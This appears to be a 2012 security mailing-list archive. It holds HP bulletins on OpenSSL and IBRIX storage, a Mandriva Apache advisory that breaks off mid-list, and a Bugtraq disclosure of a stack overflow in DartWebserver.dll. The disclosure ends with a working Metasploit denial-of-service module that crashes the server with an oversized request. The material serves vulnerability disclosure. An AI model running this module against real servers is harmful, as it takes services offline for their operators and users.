ACTIONS: Yes - Update Install OpenSSL A.00.09.08x or subsequent PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa The following text is for use by the HP-UX Software Assistant. AFFECTED VERSIONS HP-UX B.11.11 == openssl.OPENSSL-CER openssl.OPENSSL-CONF openssl.OPENSSL-DOC openssl.OPENSSL-INC openssl.OPENSSL-LIB openssl.OPENSSL-MAN openssl.OPENSSL-MIS openssl.OPENSSL-PRNG openssl.OPENSSL-PVT openssl.OPENSSL-RUN openssl.OPENSSL-SRC action: Install revision A.00.09.08x.001 or subsequent HP-UX B.11.23 == openssl.OPENSSL-CER openssl.OPENSSL-CONF openssl.OPENSSL-DOC openssl.OPENSSL-INC openssl.OPENSSL-LIB openssl.OPENSSL-MAN openssl.OPENSSL-MIS openssl.OPENSSL-PRNG openssl.OPENSSL-PVT openssl.OPENSSL-RUN openssl.OPENSSL-SRC action: Install revision A.00.09.08x.002 or subsequent HP-UX B.11.31 == openssl.OPENSSL-CER openssl.OPENSSL-CONF openssl.OPENSSL-DOC openssl.OPENSSL-INC openssl.OPENSSL-LIB openssl.OPENSSL-MAN openssl.OPENSSL-MIS openssl.OPENSSL-PRNG openssl.OPENSSL-PVT openssl.OPENSSL-RUN openssl.OPENSSL-SRC action: Install revision A.00.09.08x.003 or subsequent END AFFECTED VERSIONS HISTORY Version:1 (rev.1) - 26 September 2012 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-al...@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c02964430 Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2012 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates,
[security bulletin] HPSBST02818 SSRT100960 rev.1 - HP IBRIX X9000 Storage, Remote Disclosure of Information
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Note: the current version of the following document is available here: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c03510876 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03510876 Version: 1 HPSBST02818 SSRT100960 rev.1 - HP IBRIX X9000 Storage, Remote Disclosure of Information NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2012-10-01 Last Updated: 2012-10-01 Potential Security Impact: Remote disclosure of information Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP IBRIX X9000 Storage. The vulnerability could be remotely exploited to allow disclosure of information. References: CVE-2012-3266 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP IBRIX X9000 Network Storage Systems running IBRIX versions v6.1.196, v6.1.210, v6.1.228, v6.1.243, v6.1.247, v6.1.249, and v6.1.251. BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2012-3266(AV:N/AC:L/Au:N/C:C/I:C/A:C)10 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP has provided patches for HP IBRIX X9000 Network Storage Systems running IBRIX. Please contact HP support to obtain IBRIX version v6.1.260 or later. HISTORY Version:1 (rev.1) - 1 October 2012 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-al...@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c02964430 Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2012 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iEUEARECAAYFAlBqDCcACgkQ4B86/C0qfVkadgCYroRkMPo//14HxZ/AgNnrPu6L HACfXxLqxteu8lVqp4mL9pt6ga75L3I= =HQO8 -END PGP SIGNATURE-
[ MDVSA-2012:154-1 ] apache
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2012:154-1 http://www.mandriva.com/security/ ___ Package : apache Date: October 1, 2012 Affected: 2011. ___ Problem Description: Multiple vulnerabilities has been found and corrected in apache (ASF HTTPD): Insecure handling of LD_LIBRARY_PATH was found that could lead to the current working directory to be searched for DSOs. This could allow a local user to execute code as root if an administrator runs apachectl from an untrusted directory (CVE-2012-0883). Possible XSS for sites which use mod_negotiation and allow untrusted uploads to locations which have MultiViews enabled (CVE-2012-2687). The updated packages have been upgraded to the latest 2.2.23 version which is not vulnerable to these issues. Update: Packages for Mandriva Linux 2011 is also being provided. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0883 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2687 http://httpd.apache.org/security/vulnerabilities_22.html http://www.apache.org/dist/httpd/CHANGES_2.2.23 ___ Updated Packages: Mandriva Linux 2011: 304de24601ba6d0511bb81b874a0f233 2011/i586/apache-base-2.2.23-0.1-mdv2011.0.i586.rpm 2cb8260077a6397789fbd5d4a4d085eb 2011/i586/apache-conf-2.2.23-0.1-mdv2011.0.i586.rpm 30b35a2b7e38d194a2616aabf282fc8e 2011/i586/apache-devel-2.2.23-0.1-mdv2011.0.i586.rpm 808b441d5f6a4dfe677027f052be5b2e 2011/i586/apache-doc-2.2.23-0.1-mdv2011.0.noarch.rpm 48e1b89096e022e2370846ee6be23cb0 2011/i586/apache-htcacheclean-2.2.23-0.1-mdv2011.0.i586.rpm 69e8ff977665c5ffcaa56a633a9c075d 2011/i586/apache-mod_authn_dbd-2.2.23-0.1-mdv2011.0.i586.rpm cef83ce377d853787f157372d174e43a 2011/i586/apache-mod_cache-2.2.23-0.1-mdv2011.0.i586.rpm e727d7356474d2899d971ded9ead528a 2011/i586/apache-mod_dav-2.2.23-0.1-mdv2011.0.i586.rpm a6d4a2d3bde1c22f9885e45674acb859 2011/i586/apache-mod_dbd-2.2.23-0.1-mdv2011.0.i586.rpm e95a0e806ed2714f58c4931f923dd9ff 2011/i586/apache-mod_deflate-2.2.23-0.1-mdv2011.0.i586.rpm eea3f9df618d84f4d7718fa7f7ed7fc2 2011/i586/apache-mod_disk_cache-2.2.23-0.1-mdv2011.0.i586.rpm f4e5b517609491cff78e787478701c2d 2011/i586/apache-mod_file_cache-2.2.23-0.1-mdv2011.0.i586.rpm e6b6bf3657df8d57f714b376f0a46c17 2011/i586/apache-mod_ldap-2.2.23-0.1-mdv2011.0.i586.rpm f08c6df85eee5fb376495a1962fe3b70 2011/i586/apache-mod_mem_cache-2.2.23-0.1-mdv2011.0.i586.rpm 8e0e8200b769acf3c5e4bbe7726fd915 2011/i586/apache-mod_proxy-2.2.23-0.1-mdv2011.0.i586.rpm 6c999383b58c6ee96282386b4fb7d9ea 2011/i586/apache-mod_proxy_ajp-2.2.23-0.1-mdv2011.0.i586.rpm 20b0d2479343f49409b5e31e9338f4dc 2011/i586/apache-mod_proxy_scgi-2.2.23-0.1-mdv2011.0.i586.rpm 1e51299c37aa0cbd03a65a260d12ddeb 2011/i586/apache-mod_reqtimeout-2.2.23-0.1-mdv2011.0.i586.rpm 0ddbed217d6677478b0a2a01732ff491 2011/i586/apache-mod_ssl-2.2.23-0.1-mdv2011.0.i586.rpm 0a14fbf39eab16eb6f306545149d1d08 2011/i586/apache-mod_suexec-2.2.23-0.1-mdv2011.0.i586.rpm 58a903513f5debd76f3af90df3cb81f2 2011/i586/apache-modules-2.2.23-0.1-mdv2011.0.i586.rpm 92dc4453fc1412585be0a2d6910ad1bb 2011/i586/apache-mod_userdir-2.2.23-0.1-mdv2011.0.i586.rpm a6fcd50c146c04c53adfd63cdeff0886 2011/i586/apache-mpm-event-2.2.23-0.1-mdv2011.0.i586.rpm 2789b0dff916fbc432705402ccaf48b0 2011/i586/apache-mpm-itk-2.2.23-0.1-mdv2011.0.i586.rpm 1373ec52e55560feab9bbc4841d121c7 2011/i586/apache-mpm-peruser-2.2.23-0.1-mdv2011.0.i586.rpm 02b03a8c84896f04ce7c4ee098db88f1 2011/i586/apache-mpm-prefork-2.2.23-0.1-mdv2011.0.i586.rpm 9fff7197d3b44a8dc4c328ae42b0c78d 2011/i586/apache-mpm-worker-2.2.23-0.1-mdv2011.0.i586.rpm b377ef4867bb4bb4740b6c454c673ae9 2011/i586/apache-source-2.2.23-0.1-mdv2011.0.i586.rpm ff8b62d886256d35b4b48b599dde8b42 2011/SRPMS/apache-2.2.23-0.1.src.rpm b293c41bc67cd64e55d4f76cbc01e5fa 2011/SRPMS/apache-conf-2.2.23-0.1.src.rpm 7b26aff710ef4cf8761ee0f2d56335de 2011/SRPMS/apache-mod_suexec-2.2.23-0.1.src.rpm Mandriva Linux 2011/X86_64: c4985b28e7ec9150a212a50b83acf971 2011/x86_64/apache-base-2.2.23-0.1-mdv2011.0.x86_64.rpm 1a47380b5c2408302ae45e53c57e3dd7 2011/x86_64/apache-conf-2.2.23-0.1-mdv2011.0.x86_64.rpm 1ddc2098bd25562f20fb5dc13f15bbb4 2011/x86_64/apache-devel-2.2.23-0.1-mdv2011.0.x86_64.rpm 98ebe1c72a3f4393089f4dff74478aef 2011/x86_64/apache-doc-2.2.23-0.1-mdv2011.0.noarch.rpm cdd1a070b46dae87bcc56c9ffdf787e1 2011/x86_64/apache-htcacheclean-2.2.23-0.1-mdv2011.0.x86_64.rpm b63b8c6c86a1d12c0d7d975965c68520 2011/x86_64/apache-mod_authn_dbd-2.2.23-0.1-mdv2011.0.x
CVE-2012-3819: Stack Overflow in DartWebserver.dll <= 1.9
Overview
===
DartWebserver.Dll is an HTTP server provided by Dart Comunications
(dart.com). It is distributed intheir PowerTCP/Webserver For ActiveX
product and likely other similar products.
"Build web applications in any familiar software development
environment. Use WebServer for ActiveX to add web-based access to
traditional compiled applications."
Version 1.9 and prior is vulnerable to a stack overflow exception,
these maybe generated by producing large requests to the application,
e.g. "a" * 520 + "\n\n"
Analysis
===
During the processing of incoming HTTP requests the server collects
data until it encounters a "\n\n" sentinel. If the request is large,
multiple copies are made and stored on the stack, this consumes the
amount of stack space available to the process quickly, leading to a
stack overflow exception being thrown. This exception is not handled
and will typically lead to the termination of the parent process. Some
variations may exist per system depending on pre-existing memory
conditions and modification of Proof Of Concept (PoC) code may be
necessary to reproduce the exception.
Timeline
===
10/20/2011 - Discovered the bug in an affected vendor application
10/20/2011 - Contacted affected vendor
10/21/2011 - Affected vendor replies stating they can not get the
product vendor to create a fix
06/29/2012 - CVE assignment
08/08/2012 - Contacted product vendor providing specifics
08/20/2012 - Product vendor created an issue number (#5654) for the
bug, but reply "there are not immediate plans to resolve the issue"
09/28/2012 - Posting to bugtraq, for the first time ever ;-)
PoC (MSF Module)
===
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Description'=> %q{ 'Name' => 'Dart Webserver
<= 1.9.0 Stack Overflow',
Dart Webserver from Dart Communications throws a stack
overflow exception
when processing large requests.
}
,
'Author' => [
'catatonicprime'
],
'Version'=> '$Revision: 15513 $',
'License'=> MSF_LICENSE,
'References' => [
[ 'CVE', '2012-3819' ],
],
'DisclosureDate' => '9/28/2012'))
register_options([
Opt::RPORT(80),
OptInt.new('SIZE', [ true, 'Estimated stack size to exhaust',
'52' ])
])
end
def run
serverIP = datastore['RHOST']
if (datastore['RPORT'].to_i != 80)
serverIP += ":" + datastore['RPORT'].to_s
end
size = datastore['SIZE']
print_status("Crashing the server ...")
request = "A" * size + "\r\n\r\n"
connect
sock.put(request)
disconnect
end
end
